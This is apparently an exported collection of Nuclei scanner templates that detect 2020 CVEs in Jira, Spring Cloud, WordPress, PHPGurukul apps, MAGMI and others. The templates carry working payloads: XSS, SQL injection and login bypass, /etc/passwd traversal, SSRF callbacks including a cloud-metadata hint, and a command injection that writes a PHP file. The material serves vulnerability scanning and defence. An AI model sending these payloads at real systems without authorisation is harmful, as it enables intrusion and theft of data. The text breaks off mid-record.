description: Jira Server and Data Center is susceptible to information disclosure. 
An attacker can enumerate users via the QueryComponentRendererValue!Default.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. Affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.\n impact: |\n An attacker can gain access to sensitive information, potentially leading to further attacks.\n remediation: |\n Apply the necessary patches or updates provided by Atlassian to fix the vulnerability.\n reference:\n - https://twitter.com/ptswarm/status/1402644004781633540\n - https://jira.atlassian.com/browse/JRASERVER-71559\n - https://nvd.nist.gov/vuln/detail/CVE-2020-36289\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/StarCrossPortal/scalpel\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2020-36289\n cwe-id: CWE-863\n epss-score: 0.91164\n epss-percentile: 0.98655\n cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: atlassian\n product: data_center\n shodan-query: http.component:\"Atlassian Jira\"\n tags: cve,cve2020,jira,atlassian,unauth\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'\n - '{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'rel=\\\"admin\\\"'\n\n - type: word\n part: header\n words:\n - 'application/json'\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100898e394070c92c7a02d36dcfc81e5aab7fa675d1b34ee54ef3f7b0695240db83022100dc4514faa3631043b8720e95822353c897a7fd577c593cf8dac8ee1b12e9e20e:922c64590222798bb761d5b6d8e72950", "hash": "407df7fd3d1ca51ece484e46d027d34f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30821d" }, "name": 
"CVE-2020-36365.yaml", "content": "id: CVE-2020-36365\n\ninfo:\n name: Smartstore <4.1.0 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: Smartstore (aka \"SmartStoreNET\") before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.\n remediation: |\n Upgrade Smartstore to version 4.1.0 or later to fix the open redirect vulnerability.\n reference:\n - https://github.com/smartstore/SmartStoreNET/issues/2113\n - https://github.com/smartstore/SmartStoreNET\n - https://nvd.nist.gov/vuln/detail/CVE-2020-36365\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-36365\n cwe-id: CWE-601\n epss-score: 0.00244\n epss-percentile: 0.62379\n cpe: cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: smartstore\n product: smartstorenet\n shodan-query: http.html:'content=\"Smartstore'\n tags: cve2020,cve,redirect,smartstore\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh'\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4b0a004830460221009a56af69b3c21b9fa51cb0f1ce2fc157d3bdc58bb721e709177dc38621b0de1c022100d1822d3b7e4d326ee387d0080c3efa1014d7db6936cdb908a687e0412facc9a1:922c64590222798bb761d5b6d8e72950", "hash": 
"ad6c7eeb54ce6b355fa9f40cc4b86cd5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30821e" }, "name": "CVE-2020-36510.yaml", "content": "id: CVE-2020-36510\n\ninfo:\n name: WordPress 15Zine <3.3.0 - Cross-Site Scripting\n author: veshraj\n severity: medium\n description: |\n WordPress 15Zine before 3.3.0 is vulnerable to reflected cross-site scripting because the theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update WordPress 15Zine to version 3.3.0 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/d1dbc6d7-7488-40c2-bc38-0674ea5b3c95\n - https://nvd.nist.gov/vuln/detail/CVE-2020-36510\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-36510\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42122\n cpe: cpe:2.3:a:codetipi:15zine:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: \"false\"\n max-request: 1\n vendor: codetipi\n product: 15zine\n framework: wordpress\n tags: cve2020,cve,xss,wordpress,wp-theme,wp,wpscan,codetipi\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/themes/15zine/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/themes/15zine/assets/'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n 
status:\n - 200\n# digest: 4a0a00473045022100c1ef38f0b31cc4796a572017f5aa569d3ca8d69d5db61193a22056a2fa4b791102205dd37e9b2682478a3d9d1e057acfd977eae5d1ccfd95e114c39457cc26e9b90e:922c64590222798bb761d5b6d8e72950", "hash": "cf7eb3af215df50bcf9f53acc8a7dc08", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30821f" }, "name": "CVE-2020-4463.yaml", "content": "id: CVE-2020-4463\n\ninfo:\n name: IBM Maximo Asset Management Information Disclosure - XML External Entity Injection\n author: dwisiswant0\n severity: high\n description: |\n IBM Maximo Asset Management is vulnerable to an\n XML external entity injection (XXE) attack when processing XML data.\n A remote attacker could exploit this vulnerability to expose\n sensitive information or consume memory resources.\n impact: |\n The vulnerability can lead to unauthorized access to sensitive information or a denial of service.\n remediation: |\n Apply the latest security patches or updates provided by IBM to mitigate the vulnerability.\n reference:\n - https://www.ibm.com/support/pages/security-bulletin-ibm-maximo-asset-management-vulnerable-information-disclosure-cve-2020-4463\n - https://github.com/Ibonok/CVE-2020-4463\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/181484\n - https://www.ibm.com/support/pages/node/6253953\n - https://nvd.nist.gov/vuln/detail/CVE-2020-4463\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L\n cvss-score: 8.2\n cve-id: CVE-2020-4463\n cwe-id: CWE-611\n epss-score: 0.76538\n epss-percentile: 0.97916\n cpe: cpe:2.3:a:ibm:maximo_asset_management:7.6.0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: ibm\n product: maximo_asset_management\n shodan-query: http.favicon.hash:-399298961\n tags: cve,cve2020,ibm,xxe,disclosure\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/os/mxperson\"\n - \"{{BaseURL}}/meaweb/os/mxperson\"\n\n body: |\n \n \n \n \n\n headers:\n Content-Type: \"application/xml\"\n\n 
matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"QueryMXPERSONResponse\"\n - \"MXPERSONSet\"\n\n - type: word\n part: header\n words:\n - \"application/xml\"\n# digest: 4b0a00483046022100d058bbbb18f9fcaf0793777079b5c78305acfdad26be6dd11135dfa666fb92b60221009914324daf438c22b331865eda5e672cc52bc7a691d94bca7a4eb59450bc5a3e:922c64590222798bb761d5b6d8e72950", "hash": "c83a3897128bbe8e7d8c1869dfd278f8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308220" }, "name": "CVE-2020-5191.yaml", "content": "id: CVE-2020-5191\n\ninfo:\n name: PHPGurukul Hospital Management System - Cross-Site Scripting\n author: TenBird\n severity: medium\n description: |\n PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/47841\n - https://phpgurukul.com/hospital-management-system-in-php/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-5191\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-5191\n cwe-id: CWE-79\n epss-score: 0.00345\n epss-percentile: 0.68617\n cpe: cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: phpgurukul\n product: hospital_management_system\n tags: cve2020,cve,hms,cms,xss,authenticated,edb,phpgurukul\n\nhttp:\n - raw:\n - |\n POST /hospital/hms/admin/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: 
application/x-www-form-urlencoded\n\n username={{username}}&password={{password}}&submit=&submit=\n - |\n POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220124a1449183f188b35b4f719c2326afa6646b898b1e01eba50c58b774045f986022100e740bb911aae6f4d5a6af96139596c6f0e7b0ae853d6d324a26b44037b0863c1:922c64590222798bb761d5b6d8e72950", "hash": "cbc3c32bdd75c675d34d8c85eb391fe4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308221" }, "name": "CVE-2020-5192.yaml", "content": "id: CVE-2020-5192\n\ninfo:\n name: Hospital Management System 4.0 - SQL Injection\n author: TenBird\n severity: high\n description: |\n Hospital Management System 4.0 contains multiple SQL injection vulnerabilities because multiple pages and parameters do not validate user input. 
An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Hospital Management System 4.0.\n reference:\n - https://www.exploit-db.com/exploits/47840\n - https://phpgurukul.com/hospital-management-system-in-php/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-5192\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-5192\n cwe-id: CWE-89\n epss-score: 0.38401\n epss-percentile: 0.96871\n cpe: cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: phpgurukul\n product: hospital_management_system\n tags: cve,cve2020,hms,cms,sqli,authenticated,edb,phpgurukul\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /hospital/hms/doctor/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}password={{password}}&submit=&submit=\n - |\n POST /hospital/hms/doctor/search.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n searchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5(num)}}'\n\n - type: status\n status:\n - 200\n# digest: 
4b0a00483046022100916c7a42d0436fc82b9ac530b4662f02687d7d10be9fd214377e261678aa6844022100f4a16d34647bc967921196ede47cf60acaa958982be7b443d8c1a0548c515288:922c64590222798bb761d5b6d8e72950", "hash": "ed663e288b0e866d31eb916b71e64ba6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308222" }, "name": "CVE-2020-5284.yaml", "content": "id: CVE-2020-5284\n\ninfo:\n name: Next.js <9.3.2 - Local File Inclusion\n author: rootxharsh,iamnoooob,dwisiswant0\n severity: medium\n description: Next.js versions before 9.3.2 are vulnerable to local file inclusion. An attacker can craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: This issue is fixed in version 9.3.2.\n reference:\n - https://github.com/zeit/next.js/releases/tag/v9.3.2\n - https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj\n - https://nvd.nist.gov/vuln/detail/CVE-2020-5284\n - https://github.com/Z0fhack/Goby_POC\n - https://github.com/merlinepedra/nuclei-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 4.3\n cve-id: CVE-2020-5284\n cwe-id: CWE-22,CWE-23\n epss-score: 0.00213\n epss-percentile: 0.58675\n cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zeit\n product: next.js\n tags: cve,cve2020,nextjs,lfi,zeit\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/_next/static/../server/pages-manifest.json\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: regex\n part: body\n regex:\n - 
'\\{\"/_app\":\".*?_app\\.js\"'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100cf159e65f362247e3e0a65e83c53300c9520bdf1e380765a8409fa22e623af0d02204351e223719946f992f804a11e35bf15d60a75603f57f242a0aab437fb152249:922c64590222798bb761d5b6d8e72950", "hash": "b728c7e12d59fdd156686d20a552c689", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308223" }, "name": "CVE-2020-5307.yaml", "content": "id: CVE-2020-5307\n\ninfo:\n name: PHPGurukul Dairy Farm Shop Management System 1.0 - SQL Injection\n author: gy741\n severity: critical\n description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the PHPGurukul Dairy Farm Shop Management System 1.0.\n reference:\n - https://cinzinga.com/CVE-2020-5307-5308/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-5307\n - https://www.exploit-db.com/exploits/47846\n - https://cinzinga.github.io/CVE-2020-5307-5308/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-5307\n cwe-id: CWE-89\n epss-score: 0.01863\n epss-percentile: 0.87061\n cpe: cpe:2.3:a:phpgurukul:dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: phpgurukul\n product: dairy_farm_shop_management_system\n tags: cve,cve2020,sqli,edb,phpgurukul\n\nhttp:\n - raw:\n - |\n POST /dfsms/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: 
application/x-www-form-urlencoded\n\n username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"add-category.php\"\n\n - type: status\n status:\n - 302\n# digest: 490a0046304402206abbdc420c025030b3ebf5d8939913814cdc09df85341ba215d904100e17fd24022033075b2aa72417041b94db8cafc9fed1f0c3129b5f4a913e928f3fbc6e8add40:922c64590222798bb761d5b6d8e72950", "hash": "bf08a1b02a008d2f8b850061cd0a964e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308224" }, "name": "CVE-2020-5405.yaml", "content": "id: CVE-2020-5405\n\ninfo:\n name: Spring Cloud Config - Local File Inclusion\n author: harshbothra_\n severity: medium\n description: Spring Cloud Config versions 2.2.x prior to 2.2.2, 2.1.x prior to 2.1.7, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files through the spring-cloud-config-server module.\n impact: |\n An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.\n remediation: |\n Upgrade to a patched version of Spring Cloud Config or apply the recommended security patches to mitigate the vulnerability.\n reference:\n - https://pivotal.io/security/cve-2020-5405\n - https://nvd.nist.gov/vuln/detail/CVE-2020-5405\n - https://github.com/Secxt/FINAL\n - https://github.com/pen4uin/vulnerability-research-list\n - https://github.com/sobinge/nuclei-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N\n cvss-score: 6.5\n cve-id: CVE-2020-5405\n cwe-id: CWE-22,CWE-23\n epss-score: 0.00258\n epss-percentile: 0.64891\n cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n product: spring_cloud_config\n tags: cve2020,cve,lfi,springcloud,vmware\n\nhttp:\n - method: GET\n path:\n - 
'{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c059c7278507f83bffb3a509de37fca67199cdbb112b7910a686bd272d247a1b022100a8fd47401a00929300f8c6807be48adf72a995e86e7b2edcc4daf10af08cd840:922c64590222798bb761d5b6d8e72950", "hash": "730aba78980ef70761bd3889bee4017d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308225" }, "name": "CVE-2020-5410.yaml", "content": "id: CVE-2020-5410\n\ninfo:\n name: Spring Cloud Config Server - Local File Inclusion\n author: mavericknerd\n severity: high\n description: Spring Cloud Config Server versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user or attacker can send a request using a specially crafted URL that can lead to a local file inclusion attack.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure.\n remediation: |\n Upgrade to a patched version of Spring Cloud Config Server or apply the recommended security patches.\n reference:\n - https://tanzu.vmware.com/security/cve-2020-5410\n - https://nvd.nist.gov/vuln/detail/CVE-2020-5410\n - https://github.com/Live-Hack-CVE/CVE-2020-5410\n - https://github.com/tdtc7/qps\n - https://github.com/alphaSeclab/sec-daily-2020\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-5410\n cwe-id: CWE-22,CWE-23\n epss-score: 0.96876\n epss-percentile: 0.99649\n cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n product: spring_cloud_config\n tags: 
cve,cve2020,lfi,springcloud,config,traversal,kev,vmware\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203db5df7db50e8b1055bb3e76398c0b5656934012adbb9f23a1944b9a36c2754702202109a44766e5fa3aa588f6b3ace938919f8f64a947884f0db7d32f7ed22327f9:922c64590222798bb761d5b6d8e72950", "hash": "81d04f378d582fddf6f08479ada489e6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308226" }, "name": "CVE-2020-5412.yaml", "content": "id: CVE-2020-5412\n\ninfo:\n name: Spring Cloud Netflix - Server-Side Request Forgery\n author: dwisiswant0\n severity: medium\n description: Spring Cloud Netflix 2.2.x prior to 2.2.4, 2.1.x prior to 2.1.6, and older unsupported versions are susceptible to server-side request forgery. Applications can use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. 
An attacker can send a request to other servers and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n The vulnerability can result in unauthorized access to sensitive data or systems, leading to potential data breaches or further exploitation.\n remediation: |\n Apply the latest security patches or updates provided by Spring Cloud Netflix to mitigate the vulnerability.\n reference:\n - https://tanzu.vmware.com/security/cve-2020-5412\n - https://nvd.nist.gov/vuln/detail/CVE-2020-5412\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n - https://github.com/pen4uin/awesome-vulnerability-research\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2020-5412\n cwe-id: CWE-610,CWE-441\n epss-score: 0.05469\n epss-percentile: 0.93009\n cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n product: spring_cloud_netflix\n tags: cve,cve2020,ssrf,springcloud,vmware\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/proxy.stream?origin=http://{{interactsh-url}}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: header\n words:\n - \"Jelly\"\n\n - type: status\n status:\n - 200\n\n# To get crithit, try http://169.254.169.254/latest/metadata/\n# digest: 4b0a00483046022100a6d1808432aa21357bfeceffa715768a7fcae54a5d6534e9d8a555629d1604f3022100e9de25f0b1d120f4b001820ec6d8ed841562d6cf449d223eb8fc6afa81e8bcbe:922c64590222798bb761d5b6d8e72950", "hash": "1e43caac0774b6120853fe0b2e74daba", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308227" }, "name": "CVE-2020-5775.yaml", "content": "id: CVE-2020-5775\n\ninfo:\n name: Canvas LMS v2020-07-29 - Blind Server-Side Request Forgery\n author: alph4byt3\n severity: medium\n description: Canvas version 
2020-07-29 is susceptible to blind server-side request forgery. An attacker can cause Canvas to perform HTTP GET requests to arbitrary domains and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.\n remediation: |\n Apply the latest security patches provided by Canvas LMS to mitigate the vulnerability.\n reference:\n - https://www.tenable.com/security/research/tra-2020-49\n - https://nvd.nist.gov/vuln/detail/CVE-2020-5775\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N\n cvss-score: 5.8\n cve-id: CVE-2020-5775\n cwe-id: CWE-918\n epss-score: 0.00194\n epss-percentile: 0.57293\n cpe: cpe:2.3:a:instructure:canvas_learning_management_service:2020-07-29:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: instructure\n product: canvas_learning_management_service\n tags: cve,cve2020,ssrf,oast,blind,tenable,instructure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/external_content/retrieve/oembed?endpoint=http://{{interactsh-url}}&url=foo\"\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a00473045022100918e8bbee2f70a24536ea9b4b93bcdcb518ee413cb81c7ac821e994b6d6120ba02204345f63adc17a9b7cc30988b3811c511794446f3b0bd1a3796f96550a0d74c57:922c64590222798bb761d5b6d8e72950", "hash": "687aad767d903b287151f19b92725d4b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308228" }, "name": "CVE-2020-5776.yaml", "content": "id: CVE-2020-5776\n\ninfo:\n name: MAGMI - Cross-Site Request Forgery\n author: dwisiswant0\n severity: high\n description: MAGMI (Magento Mass Importer) is vulnerable to cross-site request forgery (CSRF) due to a 
lack of CSRF tokens. Remote code execution (via phpcli command) is also possible in the event that CSRF is leveraged against an existing admin session.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to perform unauthorized actions on behalf of the victim user.\n remediation: |\n Implement CSRF protection mechanisms such as anti-CSRF tokens and referer validation.\n reference:\n - https://www.tenable.com/security/research/tra-2020-51\n - https://nvd.nist.gov/vuln/detail/CVE-2020-5776\n - https://github.com/sobinge/nuclei-templates\n - https://github.com/404notf0und/CVE-Flow\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-5776\n cwe-id: CWE-352\n epss-score: 0.50353\n epss-percentile: 0.97455\n cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: magmi_project\n product: magmi\n shodan-query: http.component:\"Magento\"\n tags: cve,cve2020,magmi,magento,tenable,magmi_project\n\nhttp:\n - raw:\n - |\n POST /magmi/web/magmi_saveprofile.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Connection: close\n\n profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=\n - |\n POST /magmi/web/magmi_run.php HTTP/1.1\n Host: {{Hostname}}\n 
Content-Type: application/x-www-form-urlencoded\n Connection: close\n\n engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update\n - |\n GET /magmi/web/info.php HTTP/1.1\n Host: {{Hostname}}\n Connection: close\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"PHP Extension\"\n - \"PHP Version\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100bc2cf16817aaf1a4a28dcbcf80d5270dbe106cb819d27317b9f79a25d3ed01ad0221008c5b95bbb48cd9e491c881d690b92f104be04131ceca40463cb7f8093460f434:922c64590222798bb761d5b6d8e72950", "hash": "6935558e1d4b12e086742b2e118a9f37", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308229" }, "name": "CVE-2020-5777.yaml", "content": "id: CVE-2020-5777\n\ninfo:\n name: Magento Mass Importer <0.7.24 - Remote Auth Bypass\n author: dwisiswant0\n severity: critical\n description: Magento Mass Importer (aka MAGMI) versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure.\n impact: |\n An attacker can bypass authentication and gain unauthorized access to the Magento Mass Importer plugin.\n remediation: |\n Upgrade to version 0.7.24 or later to fix the authentication bypass vulnerability.\n reference:\n - https://github.com/dweeves/magmi-git/blob/18bd9ec905c90bfc9eaed0c2bf2d3525002e33b9/magmi/inc/magmi_auth.php#L35\n - https://nvd.nist.gov/vuln/detail/CVE-2020-5777\n - https://www.tenable.com/security/research/tra-2020-51\n - 